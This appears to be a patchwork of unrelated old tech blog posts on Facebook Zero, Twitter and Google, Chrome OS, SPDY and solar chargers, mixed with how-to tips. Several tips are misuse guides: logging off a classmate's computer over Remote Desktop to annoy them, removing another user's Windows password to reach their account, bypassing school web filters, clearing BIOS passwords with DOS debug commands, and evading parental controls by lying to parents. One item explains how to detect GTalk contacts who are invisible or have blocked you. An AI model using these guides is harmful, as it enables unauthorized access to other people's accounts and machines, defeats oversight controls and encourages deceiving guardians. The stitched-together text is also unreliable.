Facebook, mobile carriers offer free access to site

Facebook has teamed up with 50 wireless operators to offer cellphone users a stripped-down version of the social networking site that can be accessed without incurring data charges.

The new site, dubbed 0.facebook.com, is a text-only version of Facebook's flagship Internet site and is specially designed for mobile phones with limited bandwidth Internet connections.

The new site will be available beginning on Tuesday in 40 different countries, including Brazil, India, Indonesia and Turkey from a variety of carriers.

The new site comes as the world's largest Internet social network continues to grow its base and looks for ways to increase the amount of time Web surfers spend using its service.

At the company's annual developer's conference last month, Facebook introduced new technology that allows third-party Web sites to integrate Facebook features directly.

Roughly one quarter of Facebook's 400 million users access the site on mobile devices, according to the company.

But Facebook wants to make the service more accessible to cell phone users who do not own high-end smartphones such as Apple Inc's iPhone, or phones based on Google Inc's Android software.

"We are targeting people whose major barrier is they have little experience on the mobile Internet. They want to try it, they want something super simple, super fast. And they are potentially afraid of browsing costs," said Henri Moissinac, who heads Facebook's mobile business. "If you take an iPhone user in San Francisco, that's not his problem."

Among the carriers partnering with Facebook are Reliance and Videocon in India (with Tata Docomo coming soon), T-Mobile in Hungary and Vodafone in Greece.

Customers of the participating wireless operators will be able to access the new Facebook site without paying any wireless data charges, Facebook said.

The 0.facebook site offers the same capabilities as Facebook's standard website, allowing members to view their news feed, comment on posts and send messages.

But 0.facebook will not feature any photos or videos -- Web surfers can link to view photos and videos, although they will be charged standard wireless data fees by their carriers at that point.

Facebook is not paying the wireless operators any money to reimburse them for the free usage they provide and there are no financial terms to the partnerships, said Moissinac.

In addition to many so-called emerging economies in which 0.facebook will be offered, the site will be available in the United Kingdom, Finland and Hong Kong, among other places.

While the United States is not among the countries in which Facebook has operator deals, Moissinac said he hoped the site would eventually be available there as well.

Blackle saves energy because the screen is predominantly black. In January 2007 a blog post titled Black Google Would Save 750 Megawatt-hours a Year proposed the theory that a black version of the Google search engine would save a fair bit of energy due to the popularity of the search engine. Since then there has been skepticism about the significance of the energy savings that can be achieved and the cost in terms of readability of black web pages.

We believe that there is value in the concept because even if the energy savings are small, they all add up. Secondly we feel that seeing Blackle every time we load our web browser reminds us that we need to keep taking small steps to save energy.

Now, native updates you make from Buzz, and not those pulled in by 3rd party services, will be sent in near real-time, powered by Pubsubhubbub, to Twitter. Thus far, the vast majority of activity I have with Buzz is shared from other services, primarily Reader. GTalk is one of the most used messaging services on internet. People love GTalk because it’s easy to use and light. GTalk does not use much resources of your system. It’s fast and easy to get installed. And above all, it can integrate all your Gmail and Orkutcontacts in one place and that’s why GTalk is getting more popular day by day. Initially Gtalk was not having any invisible option in it. Which means you will get noticed by all your friends once you log in. Now if you want to fool the people and know about their online status even when they have logged in with invisible feature activated, then this is possible. Poor Gtalk! There are two ways to do this.

You need to have a GPRS enabled mobile handset.
Download a free software called gotalkmobile on your handset and install it.
After the installation, log on to your GTalk account with your login details.
Now, this will show you the entire online friends list. It does not matter if they are online or invisible.
In this way you can catch your offline friends as well. The persons who are being shown as offline, are not present on GTalk.
And you are done above. You will notice those online (visible + invisible) as well as the offline friends.

And the second method discovered by me:

Set the chat as off the record with target user. This can be done only when the other user is online.
Now try sending chat to that user when he is invisible or offline.
If he is invisible, then he will receive chat.
But if he Is offline, then you will receive error “ did not receive your chat”.

How to Know if Someone Has Blocked You on Gtalk :

Now this is worth exciting. Few times we notice friends not contacting us for a long time. Even though we send them messages, they never reply us back. It can happen because of three reasons.

He/She is avoiding you. (Are you that much notorious?)
He/She is offline since a long! (This is a busy world, really!)
He/she blocked you on GTalk! (He/she did not find a friend in you!)

Whatever the reson may be, it’s nice to find the reason yourself. Let’s find out the exact reason of not getting a reply back. But for this you need to have PIDGIN and configure it properly. Pidgin is a third party tool, available for free. You can use all your messenger accounts at once using this software. You can talk to your friends using AIM, ICQ, Jabber/XMPP, MSN Messenger, Yahoo!, Google Talk, Bonjour, Gadu-Gadu, IRC, Novell GroupWise Messenger, QQ, Lotus Sametime, SILC, SIMPLE, MySpaceIM, Zephyr etc. Read the below steps properly.

How to configure PIDGIN for GTalk : (Via Rakshit)

Download Pidgin.
Go To Accounts –> Manage –> Add.
It will open a new window Add Accounts.
From the drop down box choose XMPP as the Protocol.
In case of Screen name enter your Gmail Id (e.g. – solid.blogger).
Type gmail.com as the Domain/Server.
In Resource Field enter Home.
Type your Gmail Password in the Password Field.
Choose any Nickname (e.g. – Bapun) as Local alias.

And you are done with Pidgin settings. Now lets play with Pidgin to find those GTalk contacts who has blocked you. For this follow the below mentioned steps.

1. sign in to GTalk on PIDGIN with your details

2. Go to Buddies –> Show Offline Buddies (The person who has blocked you is being shown as offline to you. So, in this way you can catch him.)

3. Now all available contacts will be visible to you. Select any one contact from that list.

4. Right click on that selected contact, and click on Get Info.

5. Now here is the twist. Clicking on Get Info will show the brief profile of the person. But now if the person has blocked you on Google Talk, you won’t be able to see his/her full profile. You can’t even see his/her profile name.

This is the best way to know if someone has blocked you on google talk or not. If he has blocked you, then he will appear to you forever. I guess this the best way to findthe person who is either offline or invisible or has blocked you on google talk. Also read How To Use Gtalk In Firefox Sidebar.

Twitter Wouldn't Sell For $1 Billion, Says Source

Few sources say that Google is interested in acquiring Twitter, and has had talks with the company about a deal. Google’s internal valuation, however, would value the company at a token premium above Twitter’s last round of financing valuation,around $250 million. Some Twitter insiders want the deal, but our sources say CEO Evan Williams wouldn’t sell even for $1 billion. “He may blink, but he wouldn’t do it,” said one source.

Google may also be concerned with antitrust issues around any major search-related acquisition, we’ve heard (and others have noted).

Clearly there’s a lot of posturing going on, and quite possibly some dissent in the ranks at Twitter. The company is officially stating “Our goal is to build a profitable, independent company and we’re just getting started.” Which is exactly what any company would say under any circumstances. The fact that Facebook acquisition discussions got so far last year suggests that they were open to merger discussions. But the valuation needed to get a deal done has increased dramatically since then.

Would Google pay more than $1 billion for Twitter? No idea. But there’s no way Microsoft lets a deal be negotiated without putting its bid in, too. And if these two giants see Twitter as the future of search, $1 billion is peanuts.

The Near Term Deal

Meanwhile, business discussions between Twitter and Google continue. The deal Google wants: a real time feed of Twitter updates to speed indexing. Without that feed Google must independently index each Twitter user periodically to look for updates. That means it’s dreadfully slow in grabbing all those Twitter posts. And it’s also very expensive from a computing resource standpoint. A real time feed would be of huge value to Google, and they’d be smart to nail down a long term deal sooner rather than later.

A real time feed of Twitter posts would negate much of the head start Twitter has in thenascent real time search space. It would be a coup for Google to get the Twitter milk without having to buy the cow. The real question is, does Twitter fully understand the value of this feed?

Google shaped the internet.

You’ve probably heard this before. Let’s try and analyze, how Google did that.

Before Google, the internet was a mess. Random links here and there, with pretty weird means of finding what you wanted. Once Google went online, you could search for whatever you wanted, and get relevant and helpful articles.

This was neat. Something people hadn’t experienced earlier. The internet marketeers figured out that Google was the next big thing. They had to make things “searchable”.

Search Engine Optimization became extremely important. People actually designed sites that were made to be found (keyword spamming, etc). But Google found ways to filter those spammers. The spammers found some more ways, and then Google found even more ways.

The “race” to the Google rank #1 is still one that people actually pursue.

But a more general thing was going on. Internet was taking shape into a text based media. That continues even till today. Most websites are textual in nature… because they can be “found” by Google. Their crawlers cannot understand flash, video, audio, and images.

Video, audio and other media based sites exist, but they do not form the bulk… even though we have enough bandwidth to support such websites now. Just because we can’t “search” video like we search “text”, internet marketeers figured out that such sites cannot have much traffic. There can be just a couple of massive video websites, the rest won’t count much (because they cannot be “found”).

That was until recently.

Now, it is the people who do the “searching” for their friends. They “like”, “share” and “retweet” things that their friends might enjoy.

That is social media in action: people linking to things they like the most. And inbound links is what Google’s entire algorithm depends on.

And Google recognizes this. It has identified the “massive link base” that Twitter is. It even wants to buy Twitter, but the creators of Twitter won’t sell it even for $1 billion (so says this post: Twitter wouldn’t sell for 1 billion, says source).

Combine this with the fact that Twitter is working on a contextual search ads. And certain ideas become obvious. Google’s downfall is here. Atleast it is for Google Search. And very likely even Google AdWords (the ads you see on the right when you search).

To prevent itself, Google has been doing a lot of work in the Social Internet arena: Orkut, FriendConnect, buying Aardvark, Reader, and more recently Buzz.

But Neither of them seems to hit the sweet spot. The one which people will embrace wholeheartedly. Just like they accepted Google Search. Could this be the beginning of the end of Google Search?

Recharging your cell phone, nature's way

A new solar cell that imitates nature's way of converting sunlight to energy is making its debut in a variety of consumer products. The technology uses a photosensitive dye to start its energy production, much the way leaves use chlorophyll to begin photosynthesis.

The dye-sensitised cells will be used to provide power for devices ranging from e-book readers to cell phones and will take some interesting forms. For e-book readers, for example, the cells may be found in thin, flexible panels stitched into the reader's cover. But such panels will also be housed in new lines of backpacks and sports bags, where they can recharge devices like cell phones and music players.

The technology, long in development, will work best in full, direct sunshine, said Dr Michael Graetzel, a chemist and professor at the Ecole Polytechnique Federale de Lausanne in Switzerland. But the cells will also make good use of dappled and ambient light, including the indoor light of fluorescent bulbs, he said.

Most photovoltaic cells are based on silicon or related inorganic materials, not dyes. Graetzel and an American colleague, Brian O'Regan, first reported on the new type of cell in the journal Nature in 1991, and Graetzel said he and other colleagues had been working since then to refine the technology. Now G24 Innovations, a company in Campbell, California, that has licensed the technology, is using it to make solar panels at its plant in Cardiff, Wales, said John Hartnett, G24's chief executive.

Some of the panels will be placed on covers designed as an accessory for Sony e-book readers, said Tobi Doeringer, the director of global sales at Mascotte Industrial Associates, a Hong Kong company that makes bags to carry cameras, phones, sports equipment, electronic games and other products. Doeringer said the covers, costing about $99, would be available by March. The cover supplies the power via a plug in a cradle along its spine.

The panels will also be installed on tennis bags, backpacks and messenger bags that have battery chargers within, as well as on bicycle, golf, shopping and beach bags. Prices of the bags will typically range from $149 to $249, he said, depending on the materials and size of the bag. Owners can plug their phones and music players into the bag for recharging, using a USB cord. The solar panels have 11 cells each, said Kevin Tabor, director of science and research at G24. Wiring goes from the panel to a battery pack in the bag, he said. It takes about six to eight sunny hours outside for the panel to fuel the recharger, he said, but longer indoors.

The performance of the dye-sensitised cells has improved steadily in the laboratory, Graetzel said. "Our dyes and electrolytes have changed," he said, and the cells have become more efficient at converting sunlight to electricity. Within the solar cell, the dye is painted in a thin layer on a porous titanium dioxide scaffold to collect light and, in a series of steps, create power. The cells draw on many surprising sources of light. "We've even had a case where we generated voltage from moonlight," he said.

Change the hardware

It has been almost half a century since the Von Neumann model of computers has been in use. You have simple logic circuits for AND, NOT, etc. And then you built more meaningful circuits using these basic ones. And then more complex ones. And finally you come up with circuits that implement the von neumann model. You have opcodes, and address addressable memory.

As of today, your computers are extremely powerful devices. Four Gigahertz of processing speed. Multiple Gigabytes of RAM. Multiple Terabytes of storage. And your computer handles all of this efficiently. You can play highly immersive games with 5.1 surround sound. A lot of number churning goes on in the background to get the graphics and sound to you. But, well, you’re unaware of it. Your computer does that for you.

Had you been asked to do all calculations for a single frame of a game, you’d take months. But the computer doesn’t. It’s a super high speed calculator.

But that’s all your computer is.

It can’t recognize faces as accurately and quickly as you can. Nor can it drive a car without errors. Neither can it distinguish between “music” and “noise”. All of this, even though your brain has a response time of the order of milliseconds. The computer’s is of the order of nanoseconds.

The advancement from vacuum tubes to silicon was a massive one. We need another such revolution to push the limits further.

Recent advances in hardware indicate that the neural network model of computing might be much more beneficial. With it, you can recognize handwriting, take decisions, etc without a bulky computer. All you need is a small device with extremely simple basic units (“neurons”). Anyway, that is still a topic of debate.

But what’s clear is that if we want the computer to do more, we need a new paradigm for computing.

Twitter’s Massive Attack

Twitter has been in the news a lot recently.

You have had major websites trying to incorporate the “twitter look”, like Facebook, Digg, etc. And then you had giants like Microsoft, Google and Yahoo partnering with Twitter. You even had celebrities joining in. Twitter became so popular that it had to take extensive steps to ensure that celebrities weren’t being faked by some random person. (Not playing ball).

You’ve even had top companies trying to imitate it (read Google buzz).

And why did this happen? No one knew. Twitter wasn’t laiden with features like Facebook or Orkut. It didn’t have quizzes, nor did it have advanced photo album maintenance tools. Nor did it have some unique interface that the whole world just loved.

Or maybe it was. The interface was to the point. You either follow someone or you don’t. You write your update, or you don’t. Twitter took care of a lot of choices for you.

“Should I upload the party pics?” Twitter decided, you cannot share photos. That’s one less decision for you to make.

Everytime you start following a person, you don’t have to put him into a particular group. You can do that later on. Yet another decision done away with. “How long should the update be?” Twitter said140 characters or less. Yet another decision done away with.

Its this simplicity, and decision making (done by the makers of twitter) that has led to its enormous success. It doesn’t have a massive set of options (like where your status-update-box must appear, or do you want the side bar on the left or right). And people like this. They can focus more on what they want.

Of late, the key idea has been letting the user decide how they want things to be. Whether it be on software, or on web applications. You have massive options, which spell checker to use, or where do you want the start button to appear?

Or even more generally in life: which operation do you want for your appendix? Operation A has these benefits and side effects, and Operation B has these benefits and side effects. Choose one and sign this form.

The doctor actually has more knowledge, and is in a better situation to decide which one would be better. Then exactly where did his expertise come into use? The same thing is happening with the web.

So, either the experts can continue lazing around and intimidate others. Or, they can actually start using their expertise and help others in whatever little way they can.

Google Chrome OS

It's been an exciting nine months since we launched the Google Chrome browser. Already, over 30 million people use it regularly. We designed Google Chrome for people who live on the web — searching for information, checking email, catching up on the news, shopping or just staying in touch with friends. However, the operating systems that browsers run on were designed in an era where there was no web. So today, we're announcing a new project that's a natural extension of Google Chrome — the Google Chrome Operating System. It's our attempt to re-think what operating systems should be.

Google Chrome OS is an open source, lightweight operating system that will initially be targeted at netbooks. Later this year we will open-source its code, and netbooks running Google Chrome OS will be available for consumers in the second half of 2010. Because we're already talking to partners about the project, and we'll soon be working with the open source community, we wanted to share our vision now so everyone understands what we are trying to achieve.

Speed, simplicity and security are the key aspects of Google Chrome OS. We're designing the OS to be fast and lightweight, to start up and get you onto the web in a few seconds. The user interface is minimal to stay out of your way, and most of the user experience takes place on the web. And as we did for the Google Chrome browser, we are going back to the basics and completely redesigning the underlying security architecture of the OS so that users don't have to deal with viruses, malware and security updates. It should just work.

Google Chrome OS will run on both x86 as well as ARM chips and we are working with multiple OEMs to bring a number of netbooks to market next year. The software architecture is simple — Google Chrome running within a new windowing system on top of a Linux kernel. For application developers, the web is the platform. All web-based applications will automatically work and new applications can be written using your favorite web technologies. And of course, these apps will run not only on Google Chrome OS, but on any standards-based browser on Windows, Mac and Linux thereby giving developers the largest user base of any platform.

Google Chrome OS is a new project, separate from Android. Android was designed from the beginning to work across a variety of devices from phones to set-top boxes to netbooks. Google Chrome OS is being created for people who spend most of their time on the web, and is being designed to power computers ranging from small netbooks to full-size desktop systems. While there are areas where Google Chrome OS and Android overlap, we believe choice will drive innovation for the benefit of everyone, including Google.

We hear a lot from our users and their message is clear — computers need to get better. People want to get to their email instantly, without wasting time waiting for their computers to boot and browsers to start up. They want their computers to always run as fast as when they first bought them. They want their data to be accessible to them wherever they are and not have to worry about losing their computer or forgetting to back up files. Even more importantly, they don't want to spend hours configuring their computers to work with every new piece of hardware, or have to worry about constant software updates. And any time our users have a better computing experience, Google benefits as well by having happier users who are more likely to spend time on the Internet.

Google SPDY the herald of a faster internet

Google has already made the fastest browser with Chrome 4 - which has the fastest JavaScript execution speed - and now it intends to speed up the web even further by changing the very protocols with which we communicate with the web.

HTTP as Google points out is rather clumsy when it comes to concurrency. Currently multiple connection need to be made, and each additional connection incurs an overhead as another connection is negotiated. Google points out further problems with the HTTP protocol:

The communication between client and server is initiated exclusively by the client. While browsing a news site, for example, the server has no way to inform the client that a new news item is available. In websites, Ajax solves this to an extent by polling the server for updates but its inefficiency is obvious.
HTTP headers are becoming larger as new features are added, and currently these are passed to the client uncompressed. While the size of an individual header might be quite small, as a large number of headers are transmitted, the size piles up. By compressing the data in the headers, over time, large savings can be incurred.
Additionally, headers are quite redundant. Many headers remain throughout the communication with one website, and need not be transmitted repeatedly.
Data compression is optional. Google believes that any data transmitted between server and client should always be compressed.

Google has designed a new protocol called SPDY (pronounced SPeeDY) with which it intends to decrease the page load times to as much as 50%. Google claims that their current draft of SPDY has already accomplished this goal.

The new protocol is implemented in a layer above HTTP, and as such no changes to the current infrastructure will be required. Additionally, SPDY will require no changes by web site authors; the only changes will be to the web servers and clients.

To accomplish all this the protocol improves on HTTP adding support for the following:

Multiplexed requests. An unlimited number of requesters can be issues at once to the same server, over a single connection using the SPDY protocol.
Prioritized requests. By specifying which resources are more important, the client and server can both deliver the important content first and faster while the non-essentials can come later.
Compressed headers. Server hint. Instead of straightaway pushing content to the client, a new “X-Subresources” header can inform the user about resources. The header can notify the user about specific resources that it should ask for. In this case the content is not pushed to the client automatically. The client can decide on its own whether to request the specified resource(s) or not. This, Google believes, will speed up non-initial communications.

BCC means Blind Carbon Copy. It provides a way of addressing messages to more than one person so that everyone's address is not displayed for all to see. ALL email programs, including the web-based email services, allow you to address messages using BCC. In other words you can "BCC" one or more recipients when sending a message. Some require that you provide at least one address in the TO: field before sending. If this is the case with your email client (program, application), place YOUR OWN email address in the TO: field. Keep your recipients' addresses in the BCC field.

WHY:

Using BCC protects your recipients' private email addresses from being spread to strangers (from being released into the public domain.)
Using BCC helps prevent SPAM.
When using BCC, messages are easier on your readers because the messages contain less text to sift through. The cleaner the message, the easier it is to read.

In Windows XP/Vista on the laptop go to My Bluetooth Places.

Select View Devices in Range.

After the discovery process is complete you should see the icon for the cell phone.

Right-click on the icon and select Discover Available Services.

To connect to your cell phone right-click on the Dial-Up Networking.

Select Connect Dial-up networking.

The phone will ask if you want to accept the connection request, decline or add to paired.

The last step pairs the phone and laptop and performs the connection request.

You will be prompted to enter a PIN code to pair up the devices, the PIN is entered in the cell phone.

A dialogue box appears asking for user name, password and the phone number of your ISP.

The phone number should be *99#

Click on the dial button to complete the connection.

Disable Adobe Updater

Well Adobe Updater is really a frustrating thing.....especially for those who have limited Internet Usage. Here is how to disable it.

It is actually not a big problem to disable Adobe Updater if an Internet Connection is available. All that needs to be done is to execute the Adobe_Updater.exe file that is located in the Program Files\Common Files\Adobe\Updater6 directory on the hard drive. The application will perform an update check and notify the user about updates. The updates won’t be installed however until the user clicks on the Download And Install Updates button.

A click on Preferences will load the configuration screen shown in the above screenshot. Unchecking the “Automatically check for Adobe updates” box will do the trick. Mac OSX users can basically do the same. The location of the Adobe Updater program on their system is /Applications/Utilities/Adobe Utilities/Adobe Updater5/.

My First Experience At Robotics Activity

Before starting I would like to make it clear that a robot is not only an object which can walk, talk and all sorts of that thinks....these we categorize as humanoids.....I work on general robotics like a small car which does various things....I am just a beginner...

Well......its seems that now my school has started taking pains and introduced robotics as an activity...

I had to struggle a lot to get it...

but in the end thanx to Iyer Sir....My favorite teacher..

Well after summer vacations our real robotics batch started...

On 7th July '09 I made my first robot......I was only able to design it bcoz the computer was not available.....so had to do the mechanical work...i did not know that the bot would work or not...

Next on 10th July when we again had a class.....I had put up a touch sensor...

The bot worked like this:

"The bot would move in a straight line till infinity until it bangs in to an object....as soon as the robot banged it would return back in the same line with a greater speed for 2 seconds and then stop..."

That was a moment of joy......My FIRST ROBOT.....AND ALL OF MY OWN...WITHOUT ANYONE'S HELP...

Again on 14th July we had our class....

I removed the touch sensor and replaced it with Ultrasonic Sensor......The bot when detected an object within the 10 cm range in front of it....it returned back on the path it had come....

Let me see what happens next......I have my classes after 8th August bcoz of my term exams...

I am planning to make such a mechanic that the NXT(the device which controlls the bot) can be mounted on the bot structure....

How to Make Windows XP Look Like Mac OS X

The program that will make the boot screen, icons, cursors, login menu, etc. look like a Mac is Flyakite OS X(Download Here) .

Go to Flyakite OS X on the top bar menu, scroll down to download and click on any of the links to start the download.

Run Flyakite OS X.

Your computer might give a warning about some DLL (.dll) files arebeing replaced and tell you to put in the repair CD. Don't worry, it should do this (If it doesn't, it doesn't really matter).

Reboot. You should be greeted with the Mac OS X login screen. If you don't, don't worry, OS X should come on in the next reboot you do.

Login. You should see your computer looking mostly like a Mac. If your computer looks completely like a Mac, you don't have to follow these next steps.

The next two programs are from Stardock. One of them (Objectbar) will last forever, but the one (Windows Blinds), has only a 30 day trial.

Go to the Windows Blinds website. Download and install Windows Blinds.

Go to Studio Twenty Eight and choose a theme.

Download Objectbar from the Stardock website.

Run Objectbar and change the theme to Mac.

How to Recover Lost Data

Data recovery is the process of retrieving lost, deleted or inaccessible data from failed electronic storage media such as computer hard disk drives, removable media, optical devices and tape cartridges.

Your data can become inaccessible due to a software problem, computer virus, mechanical or electrical malfunction or a deliberate human act.

Here I choose Data Recovery Wizard for example.

Launch the software, and choose a module according to the reason for data loss (deletion/format/partotion loss). "Deleted File Recovery" is for deletion recovery, "Complete Recovery" is for format recovery, and "Partition Recovery" is for JPG/JPEG/PNG recovery when partition is lost or corrupt.

Choose the volume where there were lost data and click "NEXT" to start searching, then you will see a list of volumes where data loss possibly happens. After that, Data Recovery Wizard will allow you to choose 6 volumes at best to recover. And then, press "NEXT" button, it will launch the "Building Directory" procedure to search the files. You will see file/folder tree very soon.

Choose and preview the lost data that you want to recover and press the "Next" button. And then select a directory and press the "NEXT" button to save the recovered data.

How to Log off Your Classmate's Computer

Make sure you're in a lab with numbered computer names. To check, go to your start menu, right click My Computer, and select properties.

Check the computer name. If it is something like school22, then check the computer next to you. If it says something like school21 or school23 then you are on the right track.

If the guy you want to attack is on computer number 17 then write down your computer name and instead of the number on your computer replace it with 17.

Go to Start, Accessories, Communications, Remote Desktop Connection

Then in the RDC (Remote Desktop Connection) Type in the computer name with the selected number in this case 17, so it should be school17.

Click Connect.

Type in your school username and password (if you have one). If you don't want to get in trouble, type in the public school username.

It should say something like "The user is on the selected computer, connecting should log them off." Click OK.

They should be logged off, but be careful. The computer logged off should say "this computer is locked by " so unless it's your friend who wouldn't say anything, you should use the public username.

Now do what you want to the computer. Shut it down or just stay on it and annoy them.

If you cannot get the computer name, go into command prompt and type "net view" and it will list all the computers on the network.

How to Delete Someone's Windows Password

Do you want access to another user's account on the same computer you use, but their account is password protected? Follow this guide to remove their password.

Forgetting your Windows administrator login password. With no way to get into the system, you can’t even perform basic maintenance, let alone a thorough tune-up. Formatting is always an option, but we consider that a last resort. (Plus, guess who’s going to have to help reinstall all the programs lost after a wipe?) But all hope is not lost. There are a few ways to actually retrieve a lost Windows account password. Read on, and we’ll show you the light.

1st Method:

The first thing which you check if you forget login password. When we install Windows, it automatically creates an account "Administrator" and sets its password to blank. So if you have forget your user account password then try this:

Start system and when you see Windows Welcome screen / Login screen, press ctrl+alt+del keys twice and it'll show Classic Login box. Now type "Administrator" (without quotes) in Username and leave Password field blank. Now press Enter and you should be able to log in Windows.

Now you can reset your account password from "Control Panel -> User Accounts".

Same thing can be done using Safe Mode. In Safe Mode Windows will show this in-built Administrator account in Login screen.

2th Method:

There are a lot of Windows password revealers and crackers available, but we’ve found that Windows Password Recovery Tool is the most effective.: Windows Password Reset Tool is one of the easiest password recovery tools to use. It allows you to reset a user account password, including the Administrator password. It is also a relatively small download.

3rd Method:

You need a second computer that can link to Internet and blank CD. Do the following:

1. Login to a second computer that can link to Internet. Download Windows Password Unlocker 4.0 and decompress it on that PC. Note that: there is a .ISO file. Burn the .ISO file to a CD.

2 Get out the newly created CD and insert it to the locked computer.

3 Re-boot the locked computer and then followed the process of instructions. Just a few steps, the old password was removed.

4. Remove the CD and login to the computer with no need of password

How to Bypass a Firewall or Internet Filter

Don't you hate it when you go to a website at school and find out that the school firewall blocks it? This guide will teach you how to bypass the web filter to access your websites. This may not work on some blockages, whether you use IP or HTML.

I figured out that if you just type in "https" rather than "http" at the beginning of the address, you can go on any site you want. Easy.

Browse by IP

Go to START -> Run. Enter cmd and hit enter, or click on START -> Program Files -> Accessories -> Command Prompt to open the Command Prompt window.
If your school has disabled access to the command prompt, right click, go to New, and select Text Document. In the text document simply type cmd then save the file as command.bat or, if this doesn't work, command.com Make sure you switch the Save As Type field in Notepad's Save dialogue to All Files. Double Click and you have successfully gained access to the command prompt.
If that doesn't work, perform the following steps at home and bring the IP address to school.
Once in the Command Prompt, enter ping x, replacing the x with any website of your choice. For example, if you are looking to access Google, then you would enter ping google.com into the prompt [leave out the HTTP://]. You can also use the nslookup command in a similar fashion. Using the same site as an example you can type nslookup www.google.com at the command prompt. Just be sure to refer to the Non-authoritative Answer for the steps that follow.
You will see a set of four numbers [here, 72.14.207.99] is Google's IP address.
Open your browser window. In the address bar, type http://x.x.x.x, replacing the x's with the ping address, and hit enter [for example, http://72.14.207.99]. This will give you access to Google.
If the web filter blocked even the IP address of the site, you can take each number in the IP and convert it to a Hexadecimal format. Then in the browser enter http:// 0x(hex1).0x(hex2).0x(hex3).0x(hex4).

Create a redirect domain

Create an account at Dot.tk and create a ".tk" domain for that site. This works great for two reasons. First of all, many firewalls use keyword blocking. For example, if the domain for a website contains the word "sex," it may be blocked regardless of what the page is actually about. Therefore, all you need to do is give your .tk version a different name. It also works because .tk is not an actual domain, rather a redirect to a domain, and probably won't be blocked.

Browse Translation

Go to a website translation site, such as Babelfish or Google Translate
Enter the desired site in the translate URL box and choose an obscure language to translate into English.

Host a PHP Proxy

On an unblocked computer, find a free PHP Host like Bravenet. Make sure it has FTP Support or a way to upload PHP scripts. Create an account.
On an unblocked computer, find a PHP Proxy script. There are many available and is usually just one file.
Upload the PHP Proxy script to your PHP Host and test it by executing the script from your browser.
To use it just type in the address of your script in your school.
As an example: If you went to Bravenet, your host might be youngone.bravenet.com. Upload your proxy i.e. "snake.php", and execute it by going to "youngone.bravenet.com/snake.php". That's it.

Disable the blocker

Some schools use proxy services (such as Bess) to do the filtering. It may be possible to disable it by going into Internet Explorer and choosing Tools>Internet Options>Connections Tab>Lan Settings and unchecking the "Use a proxy server for your LAN". It can be reenabled prior to leaving. In the likely event that this ability is disabled, one can use a registry editor to change the value of "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet SettingsProxyEnable" to 0.
Hit the go button and you will get to your favorite site!
Check the sites that are blocked on your local computer. Open Internet Explorer, and select Tools -> Internet Options. Click the "Security" tab and choose "Restricted Sites". The "Sites" button will become available. Be sure that the site you wish to access is not listed, if it is, highlight and delete it.
Lower the settings for your Internet security. This is not recommended for long periods of use, as this is how viruses and copycat programs infiltrate computers.
Install a filter-removing program. Many of these programs bypass the filter that is stopping you from accessing Myspace.com. Installing and using these programs may get you in serious trouble with your school or employer.

Browse with a "Portable" Browser

This one works if the school uses a special browser with the restrictions built into it, or third-party software to restrict common browsers such as Internet Explorer on Windows, or Safari on MacOS.

Visit mozilla.com mozilla.com or the site of another browser such as Opera.
Search for a portable version of the browser. This should be a download with a "pre-installed" copy of the browser, using regular files to store settings.
Run the portable version and enjoy.
Set an http proxy in the portable browser if needed. Visit Proxy list for daily updated proxies.

Browse with remote access

Leave a computer always on at home (and connected to the internet). Turn on remote access.
On the school computer go to Start -> Accessories -> Remote Desktop Connection. Put in your IP address (or sign up your computer at home for dyndns.org to get a name for it if your address changes all the time). You can connect to your home computer, and do anything you want from there.
You can also use a VNC service.

Browse with text editors

If the school has blocked the download of portable browsers, you can always open the website in a text editor(e.g. Notepad.exe) and save it as a HTML file and open it later with a proper internet browser(e.g. IE or FF).

Open notepad. Start menu > programs > accessories > notepad OR %SystemRoot%system32notepad.exe
File > Open and in the "File Name" field, enter the IP address of the website you'd like to visit WITH the http:// or https:// prefixes. (See above for procedure to attain IPs.)
File > Save As and save the file as an .html file. Open it in MS WORD as a HTML Webpage. (you can directly download the file with MS WORD but some schools block MS OFFICE from all network access as PowerPoint used to be able to browse folders the user was not authorized to access as it ran in Shell 0 instead of Shell 1.)

How to Break a BIOS Password

Desktop

Power off the computer and make sure that it is unplugged.
Open up your computer case. You need physical access to the motherboard to complete this procedure.
Find a circular, (mostly) silver metallic object on the motherboard. This is the CMOS battery.
CAREFULLY remove the CMOS battery, avoid touching it with your fingers, and leave it out for about 120 seconds. This will flush the CMOS memory which stores the BIOS password and all other configuration. (See Warnings)
Set the battery back into place and power on the computer.
The computer should then warn you that the CMOS configuration could not be found. You can either reconfigure it yourself or restore defaults. Restoring the default configuration should be fine.
You will notice that the BIOS password has been cleared and you can boot without it. You may reset the BIOS password to something else by going into the BIOS configuration and setting a new User Password (The Supervisor Password controls access to the BIOS, NOT the computer!)

Laptop

Remember that laptops can be trickier, especially if it's a newer model. If it has a security chip on the motherboard forget about it. You either have to physically remove the chip or contact the mfg for the "master" password. If you can boot up off of a cd or floppy try any of these methods:
Create a Win98SE bootable media "or anything that lets you boot into MS-DOS" and boot off of it.
When the A:\> prompt appears type debug and press enter.
You will then only see a "-".
Type o 70 2E "include the spaces" and press Enter.
Type o 71 ff "include the spaces" and press Enter.
Type q and press Enter.

How to Avoid Parental Controls (Vista Users)

Steps

Try guessing/knowing the password route. This is risky, though, because if the parents know that they set it up to kick you off at 9 and you're still on at 11, you're dead. Try to keep a timer, and if you go a few minutes over, say "I guess the clock's behind on the computer." Chances are, they'll make you go to bed and fix it later. (Though they may demand to see it, and if it says it's past the time it's supposed to log you off, they'll know something's up. Though if this happens, you can suggest that they didn't save the settings when they set up the time limits and they never applied. Or they closed it before it was done saving, in which case it saves half the time blocks. You may want to set some specifically for this, like from midnight to 6 AM to back you up later.)Since some computers reset the time whenever they connect to the internet, if they do go back to fix it and it's on time, just tell them that's what happened.

See if there's a guest account activated if there are time restrictions. If so, then your parent(s) probably didn't put restrictions of any kind on it, so try using that account. If they have put the limits on it, or it's not active, try bargaining with your parent(s) for a different time setup. For example, try and have them set it to allow you on from around when you get up (or they think you get up) until your bedtime/curfew. Be reasonable and don't shout, if they put the restrictions on and you ask for none, they're probably going to shut down and stop listening.

Tell your parents that you want your friends to be able to use the computer while they're over, but you have private files you don't want them accidentally opening, and you don't want to worry about watching the friend all the time. If this gets the account on, but with restrictions, let it be. It's better to have a backup account for if/when they shut down yours than only one to rely on.

